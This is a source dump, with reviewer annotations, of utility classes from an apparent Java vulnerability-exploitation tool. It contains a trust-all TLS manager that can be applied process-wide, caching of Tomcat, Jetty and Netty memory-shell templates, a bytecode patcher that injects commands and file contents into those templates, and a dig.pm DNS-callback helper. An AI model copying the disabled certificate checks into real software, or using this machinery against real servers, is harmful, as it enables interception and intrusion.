116 | http.setSSLSocketFactory(context.getSocketFactory());
117 | http.setHostnameVerifier(new HostnameVerifier() {
118 | @Override
119 | public boolean verify(String hostname, SSLSession session) {
120 | return true;
121 | }
122 | });
123 | // set a User-Agent to avoid being blocked
124 | http.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
125 | String contentType = http.getContentType();
126 | // get the file size
127 | long length = http.getContentLengthLong();
128 | if (length<0){
129 | WriteLogBase("\n[*] 下载链接时超时 :( ");
130 | }
131 | // get the file name
132 | InputStream inputStream = http.getInputStream();
133 | int total = inputStream.available();
134 |
135 |
136 | byte[] buff = 
new byte[1024*500];
137 |
138 | File file = new File(targetDirectory, fileName);
139 | if(!file.exists()){
140 | OutputStream out = new FileOutputStream(file);
141 | int len ;
142 | int count = 0; // counter
/* NOTE(review): count is incremented but never used. out, inputStream and http are closed only when the loop
   finishes normally; an IOException mid-transfer leaves them open and a partial file on disk, which the exists()
   check above then treats as "already downloaded" on the next attempt. */
143 | while((len = inputStream.read(buff)) != -1) {
144 | out.write(buff, 0, len);
145 | out.flush();
146 | ++count ;
147 | }
148 | // close resources
149 | out.close();
150 | inputStream.close();
151 | http.disconnect();
152 | WriteLogBase("\n[*] Success :)");
153 | return true;
154 | }else{
155 | WriteLogBase("\n[*] 下载路径下存在同名文件 :(");
156 | }
157 | return false;
158 | }
159 |
160 | }
/* Trust-all X509TrustManager: both check* methods accept any chain without inspection and getAcceptedIssuers()
   returns null (the interface expects a non-null, possibly empty, array). Used by Update.download() and by
   allowAllSSL(). */
161 | class HttpsTrustManager implements X509TrustManager {
162 |
163 | private static TrustManager[] trustManagers = {new HttpsTrustManager()};
164 |
165 | @Override
166 | public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
167 | // TODO Auto-generated method stub
168 |
169 | }
170 |
171 | @Override
172 | public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
173 | // TODO Auto-generated method stub
174 |
175 | }
176 |
177 | @Override
178 | public X509Certificate[] getAcceptedIssuers() {
179 | // TODO Auto-generated method stub
180 | return null;
181 | }
182 |
/* Installs the trust-all manager and an always-true HostnameVerifier as the process-wide defaults for every
   HttpsURLConnection, not only the updater's. Not referenced in the visible code. */
183 | public static void allowAllSSL() {
184 | try {
185 | SSLContext context = SSLContext.getInstance("TLS");
186 | context.init(null, trustManagers, new SecureRandom());
187 | HttpsURLConnection.setDefaultSSLSocketFactory(context.getSocketFactory());
188 | HttpsURLConnection.setDefaultHostnameVerifier(new HostnameVerifier() {
189 | @Override
190 | public boolean verify(String hostname, SSLSession session) {
191 | return true;
192 | }
193 | });
194 | } catch (Exception e) {
195 | e.printStackTrace();
196 | }
197 | }
198 |
199 | }
200 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/AESEncodeMain.java:
--------------------------------------------------------------------------------
1 | 
package com.achuna33.Utils;
2 |
3 | import javax.crypto.Cipher;
4 | import javax.crypto.KeyGenerator;
5 | import javax.crypto.SecretKey;
6 | import javax.crypto.spec.SecretKeySpec;
7 | import java.security.NoSuchAlgorithmException;
8 | import java.security.SecureRandom;
9 |
/* Passphrase-based AES helper (decompiled-style local names). The output format is presumably dictated by the
   scheme of whatever product this talks to, so the primitives are documented here rather than changed. */
10 | public class AESEncodeMain {
11 |
/**
 * Derives a 128-bit AES key from a passphrase: a "SHA1PRNG" SecureRandom is seeded with code.getBytes() (platform
 * default charset) and KeyGenerator draws the key from it.
 * NOTE(review): this is only deterministic where SHA1PRNG output is a pure function of a seed set before first use
 * (the JDK's SUN provider behaves this way); other providers or platforms may yield a different key for the same
 * passphrase. On NoSuchAlgorithmException an empty array is returned, which SecretKeySpec in encrypt() rejects.
 *
 * @param code passphrase
 * @return 16 key bytes, or an empty array on failure
 */
12 | public static byte[] initSecretKey(String code) {
13 | KeyGenerator kg = null;
14 |
15 | try {
16 | kg = KeyGenerator.getInstance("AES");
17 | SecureRandom secureRandom = SecureRandom.getInstance("SHA1PRNG");
18 | secureRandom.setSeed(code.getBytes());
19 | kg.init(128, secureRandom);
20 | } catch (NoSuchAlgorithmException var3) {
21 | var3.printStackTrace();
22 | return new byte[0];
23 | }
24 |
25 | SecretKey secretKey = kg.generateKey();
26 | return secretKey.getEncoded();
27 | }
28 |
/**
 * Encrypts sSrc (platform default charset) with AES under the key derived from sKey and returns lowercase hex.
 * "AES" without mode/padding resolves to the provider default, which for the JDK's SunJCE is AES/ECB/PKCS5Padding:
 * ECB leaks equal-block patterns and provides no integrity protection. cipher.init(1, ...) is Cipher.ENCRYPT_MODE.
 *
 * @param sSrc plaintext
 * @param sKey passphrase passed to initSecretKey
 * @return ciphertext as lowercase hex
 * @throws Exception on any JCE failure (including an empty key from initSecretKey)
 */
29 | public static String encrypt(String sSrc, String sKey) throws Exception {
30 | byte[] raw = initSecretKey(sKey);
31 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
32 | Cipher cipher = Cipher.getInstance("AES");
33 | cipher.init(1, skeySpec);
34 | byte[] encrypted = cipher.doFinal(sSrc.getBytes());
35 | return byte2hex(encrypted).toLowerCase();
36 | }
37 |
/**
 * Hex-encodes a byte array, two upper-case digits per byte (encrypt() lowercases the result again).
 *
 * @param byteArray bytes to encode
 * @return upper-case hex string, empty for an empty input
 */
38 | public static String byte2hex(byte[] byteArray) {
39 | StringBuilder sb = new StringBuilder();
40 | byte[] var2 = byteArray;
41 | int var3 = byteArray.length;
42 |
43 | for(int var4 = 0; var4 < var3; ++var4) {
44 | byte b = var2[var4];
45 | String hex = Integer.toHexString(b & 255);
46 | if (hex.length() == 1) {
47 | sb.append('0');
48 | }
49 |
50 | sb.append(hex);
51 | }
52 |
53 | return sb.toString().toUpperCase();
54 | }
55 |
56 | }
57 |
58 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/ASMChanger.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 |
4 | import org.apache.commons.lang3.StringUtils;
5 | import org.objectweb.asm.ClassVisitor;
6 | import 
org.objectweb.asm.FieldVisitor;
7 | import org.objectweb.asm.MethodVisitor;
8 | import com.achuna33.SupportType.MyDIYType;
9 |
10 |
11 | import static org.objectweb.asm.Opcodes.ASM6;
12 |
/* ASM-based template patcher: rewrites the initial value of selected constant fields (the template's parameters)
   and optionally renames the class being visited. */
13 | public class ASMChanger {
14 |
15 | public static class ModifyAccessVisitor extends ClassVisitor {
16 | public String Classname;
17 | private String Path;
18 | private String Content;
19 | private MyDIYType Template2Int;
20 |
/**
 * @param i ASM API version
 * @param classVisitor downstream visitor (normally a ClassWriter)
 * @param Template2Int template kind, selects which field names are patched in visitField
 * @param ClassName new internal class name, or "" to keep the original name
 * @param Path value for the Path/uri field
 * @param Content value for the Contentbase64/cmd field
 */
21 | public ModifyAccessVisitor(int i, ClassVisitor classVisitor, MyDIYType Template2Int, String ClassName, String Path, String Content) {
22 | super(i, classVisitor);
23 | Classname = ClassName;
24 | this.Path = Path;
25 | this.Content = Content;
26 | this.Template2Int = Template2Int;
27 | }
28 |
/**
 * Substitutes the initial value of the template's parameter fields, selected by Template2Int:
 * PutFile -> Contentbase64/Path, commandecho -> cmd/uri. Per ASM's visitField contract value is only non-null for
 * constant (static final) fields, so only such fields can carry the substituted value. Other enum values fall
 * through to the unmodified super call (there is no default branch).
 */
29 | @Override
30 | public FieldVisitor visitField(int access, String name, String descriptor, String signature, Object value) {
31 | switch(Template2Int){
32 | case PutFile:
33 | if (StringUtils.equals(name,"Contentbase64"))
34 | return super.visitField(access, name, descriptor, signature, Content);
35 | if (StringUtils.equals(name,"Path"))
36 | return super.visitField(access, name, descriptor, signature, Path);
37 | break;
38 | case commandecho:
39 | if (StringUtils.equals(name,"cmd"))
40 | return super.visitField(access, name, descriptor, signature, Content);
41 | if (StringUtils.equals(name,"uri"))
42 | return super.visitField(access, name, descriptor, signature, Path);
43 | break;
44 | }
45 | return super.visitField(access, name, descriptor, signature, value);
46 | }
/* When a new class name is set, every method body is routed through MyMethodVisitor so that field instructions are
   re-owned to the new name (see the caveat on MyMethodVisitor). */
47 | @Override
48 | public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) {
49 | if (Classname.equals("")){
50 | return super.visitMethod(access,name,descriptor,signature,exceptions);
51 | }
52 | MyMethodVisitor mv2 = new MyMethodVisitor(ASM6,super.visitMethod(access,name,descriptor,signature,exceptions),Classname);
53 | return mv2;
54 | }
/* Pass-through: inner-class entries are not rewritten even when the outer class is renamed. */
55 | @Override
56 | public void visitInnerClass(String name, String outerName, String 
innerName, int access) {
57 | super.visitInnerClass(name,outerName,innerName,access);
58 | }
/* Renames the class when Classname is non-empty; only the class's own name changes, superName and interfaces are
   passed through untouched. */
59 | @Override
60 | public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) {
61 | if (Classname.equals("")){
62 | super.visit(version,access,name,signature,superName,interfaces);
63 | }else {
64 | //Change Class Name
65 | super.visit(version,access,Classname,signature,superName,interfaces);
66 | }
67 |
68 | }
69 | }
/* Method visitor that re-owns field instructions to Classname. */
70 | public static class MyMethodVisitor extends MethodVisitor {
71 | private String Classname;
72 | public MyMethodVisitor(int i, MethodVisitor methodVisitor,String Classname) {
73 | super(i, methodVisitor);
74 | this.Classname = Classname;
75 | }
/* NOTE(review): the owner of EVERY field instruction is replaced with Classname, not just references to the class
   being renamed; a template that reads a static field of another class (Integer.TYPE, System.out, ...) would then
   resolve against the wrong owner at run time. Safer: `owner.equals(originalName) ? Classname : owner`, which needs
   the original internal name (available in ModifyAccessVisitor.visit) passed in. */
76 | @Override
77 | public void visitFieldInsn(int opcode, String owner, String name, String descriptor) {
78 | super.visitFieldInsn(opcode,Classname,name,descriptor);
79 | }
80 | }
81 |
82 | }
83 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/Cache.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 | import java.lang.reflect.Constructor;
4 | import java.lang.reflect.InvocationTargetException;
5 | import java.lang.reflect.Method;
6 | import java.util.*;
7 | import java.util.concurrent.TimeUnit;
8 |
9 | import com.achuna33.Templates.*;
10 | import com.achuna33.Utils.Utils;
11 | import com.achuna33.Controllers.BasicController;
12 | import com.achuna33.Controllers.BasicMapping;
13 | import com.achuna33.Controllers.VulnerabilityDescriptionMapping;
14 | import com.achuna33.SupportType.SupportType;
15 | import com.achuna33.SupportType.SupportVul;
16 | import com.achuna33.UI.UIController;
17 | import javafx.application.Platform;
18 | import net.jodah.expiringmap.ExpiringMap;
19 | import org.apache.commons.collections4.map.PassiveExpiringMap;
20 | import org.reflections.Reflections;
21 | import 
org.reflections.scanners.MethodAnnotationsScanner;
22 | import net.jodah.expiringmap.ExpirationPolicy;
/* Process-wide static registry: controller routes and vulnerability metadata discovered by reflection at UI
   start-up, plus an in-memory byte[] store for template classes. Generic type arguments appear stripped by the
   dump (e.g. "TreeMap>"), so the raw types shown here are presumably an artefact rather than the original code.
   The public static maps are mutable and unsynchronised. */
23 | public class Cache {
24 | public static TreeMap routes = new TreeMap(); // route map: stores key + route
25 | public static TreeMap> VulRoutes = new TreeMap>(); // product -> list of its vulnerabilities
26 | public static List SupprotType = new ArrayList(); // supported products, shown in the UI
27 | public static HashMap> VulDescriptions = new HashMap>(); // vulnerability name -> map(description, vulnerability type)
28 | public static UIController uiController;
29 | public static HashMap ThreadIdForLog = new HashMap<>();
30 |
31 |
/* Template byte store: at most 1000 entries, default expiry 30 s after creation (per-entry override through the
   4-argument put). */
32 | private static ExpiringMap map = ExpiringMap.builder()
33 | .maxSize(1000)
34 | .expiration(30, TimeUnit.SECONDS)
35 | .variableExpiration()
36 | .expirationPolicy(ExpirationPolicy.CREATED)
37 | .build();
38 |
/* Built-in templates are pinned with a 100-year expiry; entries added later through set() get the 30 s default. A
   failure here (e.g. Utils.getClassBytes) is printed and the remaining templates of the block are skipped. */
39 | static{
40 | try {
41 | // 100-year expiry: a simple way to never expire
42 | map.put("TomcatEchoTemplate", Utils.getClassBytes(TomcatEchoTemplate.class), 365 * 100, TimeUnit.DAYS);
43 | map.put("TomcatMemshellTemplate1", Utils.getClassBytes(TomcatMemshellTemplate1.class), 365 * 100, TimeUnit.DAYS);
44 | map.put("TomcatMemshellTemplate2", Utils.getClassBytes(TomcatMemshellTemplate2.class), 365 * 100, TimeUnit.DAYS);
45 | map.put("JettyMemshellTemplate", Utils.getClassBytes(JettyMemshellTemplate.class), 365 * 100, TimeUnit.DAYS);
46 | map.put("NettyMemshellTemplate", Utils.getClassBytes(NettyMemshellTemplate.class), 365 * 100, TimeUnit.DAYS);
47 |
48 | } catch (Exception e) {
49 | e.printStackTrace();
50 | }
51 | }
52 |
/**
 * Scans BasicController's package for classes annotated @BasicMapping, instantiates each through its public no-arg
 * constructor and registers it under the annotation's uri; then collects the controller's vul_* methods annotated
 * @VulnerabilityDescriptionMapping (the loop continues on the next chunk). Also stores obj as the UI sink used by
 * WriteLogBase. Prints discovery output to stdout.
 *
 * @param obj UI controller that receives log output
 * @throws NoSuchMethodException when a controller has no public no-arg constructor
 * @throws InvocationTargetException when a controller constructor throws
 * @throws InstantiationException when a controller class is abstract
 * @throws IllegalAccessException when the constructor is not accessible
 */
53 | public static void InitSupportType(UIController obj) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
54 | uiController = obj;
55 | Set> controllers = new Reflections(BasicController.class.getPackage().getName())
56 | .getTypesAnnotatedWith(BasicMapping.class);
57 | for(Class controller : controllers) {
58 | Constructor cons = controller.getConstructor();
59 | BasicController instance = (BasicController) cons.newInstance();
60 | String mapping = 
controller.getAnnotation(BasicMapping.class).uri();
61 | routes.put(mapping, instance);
62 | System.out.println(mapping);
63 | SupprotType.add(mapping); //# add the product name this class maps to
64 | Set methods = new Reflections(controller.getPackage().getName()+"."+controller.getSimpleName(),new MethodAnnotationsScanner()).getMethodsAnnotatedWith(VulnerabilityDescriptionMapping.class);
65 |
66 | List list = new ArrayList();
67 | for (Method method : methods){
/* NOTE(review): prints the Method object's class (always java.lang.reflect.Method) — apparently leftover debug
   output; method.getName() was presumably intended. */
68 | System.out.println(method.getClass());
69 | if (method.getName().startsWith("vul_")){
70 | list.add(method);
71 | HashMap hashMap =new HashMap();
72 | hashMap.put(method.getAnnotation(VulnerabilityDescriptionMapping.class).Description(),
73 | method.getAnnotation(VulnerabilityDescriptionMapping.class).SupportVulType());
/* Keyed by method name only: two controllers with an identically named vul_* method overwrite each other's entry. */
74 | VulDescriptions.put(method.getName(),hashMap);
75 | }
76 | }
77 | VulRoutes.put(mapping,list);
78 | }
79 | }
/** @return the vul_* methods registered for the product key, or null when the key is unknown */
80 | public static List getVulRoutesValue(String key){
81 | return VulRoutes.get(key);
82 | }
/** @return the description/type map registered for a vul_* method name, or null when unknown */
83 | public static HashMap getVulDescriptions(String key){
84 |
85 | return VulDescriptions.get(key);
86 | }
/**
 * Appends text to the UI log area on the JavaFX application thread.
 * NOTE(review): uiController is dereferenced without a null check, so a call before InitSupportType has run (for
 * example from Update.main) fails inside the scheduled runnable.
 */
87 | public static void WriteLogBase(String text){
88 | Platform.runLater(() -> {
89 | Cache.uiController.logTextArea.appendText(text);
90 | });
91 | }
/* Stores a template's bytes under key with the map's default expiration (30 s after creation per the builder),
   unlike the pinned built-in templates; an entry cached this way is gone after that window. */
92 | public static void set(String key,byte[] value){
93 | map.put(key,value);
94 | }
/** @return the cached bytes for key, or null when absent or expired */
95 | public static byte[] get(String key){
96 | return map.get(key);
97 | }
/* Empty entry point (left over). */
98 | public static void main(String[] args) throws InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException {
99 |
100 |
101 | }
102 | }
103 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/DNSLOG.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 | import com.achuna33.Gadgets.utils.Util;
4 | import com.alibaba.fastjson.JSON;
5 | import com.alibaba.fastjson.JSONObject;
6 |
7 | import java.net.MalformedURLException;
8 
|
9 |
10 | /*
11 | * Initialises a token; the token is refreshed when result is non-empty.
12 | *
13 | * */
/* Out-of-band DNS-log helper backed by the third-party service dig.pm: new_gen returns a token and a dedicated
   domain (requested under dns.1433.eu.org), get_results polls the hits recorded for that token. Operational note:
   callback data transits a third party, and token/domain are static, so concurrent sessions share them.
   DnslogDomain and result are never read in the visible code (the URLs are hard-coded), and
   com.achuna33.Gadgets.utils.Util is imported but unused here. */
14 | public class DNSLOG {
15 | public static String DnslogDomain = "https://dig.pm";
16 | public static String domain="";
17 | public static String token = "";
18 | public static String result = "";
19 | public DNSLOG(){}
20 | /*
21 | * Fetch results
22 | * */
/**
 * Polls dig.pm for hits recorded under the current token; status and body are also printed to stdout.
 *
 * @return the raw HTTP response
 * @throws MalformedURLException from HttpRequest when the fixed URL cannot be parsed
 */
23 | public static Response getDnslogResult() throws MalformedURLException {
24 | String data = "token="+token;
25 | Response response = new HttpRequest("https://dig.pm/get_results").Post(data);
26 | System.out.println(response.statusCode);
27 | System.out.println(response.responseBody);
28 | return response;
29 | }
30 | /*
31 | * Obtain a new domain
32 | * */
/**
 * Requests a fresh token/domain pair from dig.pm and stores both in the static fields.
 * NOTE(review): the body is parsed without checking statusCode first; when the service is unreachable responseBody
 * is presumably null or empty and JSON.parse / the JSONObject cast fails with an unchecked exception.
 *
 * @return the raw HTTP response
 * @throws MalformedURLException from HttpRequest when the fixed URL cannot be parsed
 */
33 | public static Response getDnslogDomain() throws MalformedURLException {
34 | String data = "domain=dns.1433.eu.org.";
35 | Response response = new HttpRequest("https://dig.pm/new_gen").Post(data);
36 | JSONObject json = (JSONObject) JSON.parse(response.responseBody);
37 | token = json.getString("token");
38 | domain = json.getString("domain");
39 | System.out.println(response.statusCode);
40 | System.out.println(response.responseBody);
41 | return response;
42 | }
/** @return a 4-character random label prefixed to the current domain */
43 | public static String getRandomDomain(){
44 | return Utils.getRandomString(4) +"."+domain;
45 | }
46 | public static void setDomain(String value){
47 | domain = value;
48 | }
49 |
/* Empty entry point (left over). */
50 | public static void main(String[] args) throws MalformedURLException {
51 |
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/Intruder.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 | import java.lang.reflect.InvocationTargetException;
4 | import java.lang.reflect.Method;
5 | import java.net.HttpURLConnection;
6 | import java.net.MalformedURLException;
7 |
8 | import static com.achuna33.Utils.Cache.WriteLogBase;
9 |
/* Worker thread that issues one request to target and logs the target when the status is 200. The reflection and
   HttpURLConnection imports are unused in the visible code. */
10 | public class Intruder extends Thread{
11 | public String method;
12 | 
public String target;
13 | public String args = "";
14 |
15 | public void setMethod(String method) {
16 | this.method = method;
17 | }
18 | public void setTarget(String target){
19 | this.target = target;
20 | }
21 | public void setArgs(String args){
22 | this.args = args;
23 | }
/**
 * For method "GET": requests target with args and logs the target when the status code is 200.
 * NOTE(review): if target is not a valid URL, request stays null after the printed MalformedURLException and
 * request.Get(args) throws NullPointerException on this thread; an unset method also NPEs on equals(). The "POST"
 * branch is empty (not implemented).
 */
24 | @Override
25 | public void run() {
26 | if (method.equals("GET")){
27 | HttpRequest request = null;
28 | try {
29 | request = new HttpRequest(target);
30 | } catch (MalformedURLException e) {
31 | e.printStackTrace();
32 | }
33 | Response result = request.Get(args);
34 | if (result.statusCode==200){
35 | WriteLogBase("\n[*] 存在 "+ target);
36 | }
37 | }if (method.equals("POST")){
38 |
39 | }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/MyURLClassLoader.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.InvocationTargetException;
5 | import java.lang.reflect.Method;
6 | import java.net.MalformedURLException;
7 | import java.net.URL;
8 | import java.net.URLClassLoader;
9 |
/* Loads classes from <user.dir>/lib/<jarName> through a dedicated URLClassLoader, calling the protected findClass
   reflectively to bypass parent-first delegation so that the jar's copy of a class wins over an identically named
   class on the application classpath (see the original comment in loadClass). The loader is never closed. */
10 | public class MyURLClassLoader {
11 | private URLClassLoader classLoader;
12 |
/* NOTE(review): when getURLClassLoader throws, the exception is printed and classLoader stays null, so every later
   loadClass() call fails with NullPointerException. */
13 | public MyURLClassLoader(String jarName){
14 | try{
15 | classLoader = getURLClassLoader(jarName);
16 | }catch(MalformedURLException e){
17 | e.printStackTrace();
18 | }
19 | }
20 |
/**
 * Loads className from the jar by invoking URLClassLoader.findClass reflectively (no parent delegation).
 * NOTE(review): on JDK 16+ the setAccessible call on a java.base method is refused by default
 * (InaccessibleObjectException, unchecked, not caught here) unless java.base is opened to this module. A
 * ClassNotFoundException from findClass arrives wrapped in InvocationTargetException and is printed (see the next
 * chunk), after which null is returned.
 *
 * @param className binary class name to load
 * @return the loaded class, or null on any handled failure
 */
21 | public Class loadClass(String className) {
22 | try{
23 | // the project already ships commons-beanutils:1.9.4; loadClass would resolve the copy on the project classpath
24 | // to avoid that, findClass is called instead
25 | Method method = URLClassLoader.class.getDeclaredMethod("findClass", new Class[]{String.class});
26 | method.setAccessible(true);
27 | Class clazz = (Class) method.invoke(this.classLoader, new Object[]{className});
28 | return clazz;
29 | } catch (NoSuchMethodException e) {
30 | e.printStackTrace();
31 | } catch (IllegalAccessException e) {
32 | 
e.printStackTrace();
33 | } catch (InvocationTargetException e) {
34 | e.printStackTrace();
35 | }
36 |
37 | return null;
38 | }
39 |
40 |
/**
 * Builds a URLClassLoader over <user.dir>/lib/<jarName>, parented to the system class loader (one-argument
 * constructor). The jar's existence is not checked here; a missing file only surfaces later as a
 * ClassNotFoundException from findClass.
 *
 * @param jarName file name under the lib directory
 * @return a new, unclosed URLClassLoader
 * @throws MalformedURLException if the file path cannot be turned into a URL
 */
41 | private URLClassLoader getURLClassLoader(String jarName) throws MalformedURLException {
42 | String path = System.getProperty("user.dir") + File.separator + "lib" + File.separator + jarName;
43 | File file = new File(path);
44 | URL url = file.toURI().toURL();
45 | URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{url});
46 | return urlClassLoader;
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Utils/Response.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Utils;
2 |
3 | import java.util.List;
4 | import java.util.Map;
5 |
/* Plain holder for an HTTP exchange (the Map fields' generic type arguments appear stripped by the dump). Callers
   use statusCode 0 as a "no connection / timeout" marker (see Update.goUpdate). All fields are public and mutable. */
6 | public class Response {
7 | public int statusCode;
8 | public String responseBody ;
9 | public Map> responseHeader;
10 | public Map> requestHeader;
/**
 * @param statusCode HTTP status, 0 when no response was obtained
 * @param responseBody decoded body text
 * @param responseHeader response header map
 */
11 | public Response(int statusCode, String responseBody,Map> responseHeader){
12 | this.statusCode = statusCode;
13 | this.responseBody = responseBody;
14 | this.responseHeader = responseHeader;
15 | }
/** Records the headers that were sent with the request. */
16 | public void setRequestHeader(Map> map){
17 | this.requestHeader = map;
18 | }
19 |
20 | }
21 |
--------------------------------------------------------------------------------